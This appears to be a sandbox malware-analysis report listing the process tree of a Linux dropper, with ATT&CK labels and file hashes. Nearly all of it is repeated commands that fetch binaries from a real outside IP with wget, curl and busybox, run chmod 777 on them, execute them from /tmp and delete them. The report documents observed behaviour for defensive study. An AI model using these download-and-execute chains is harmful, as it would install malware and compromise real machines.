/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:943
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:951
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:955
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:961
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:967
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:973
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:979
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97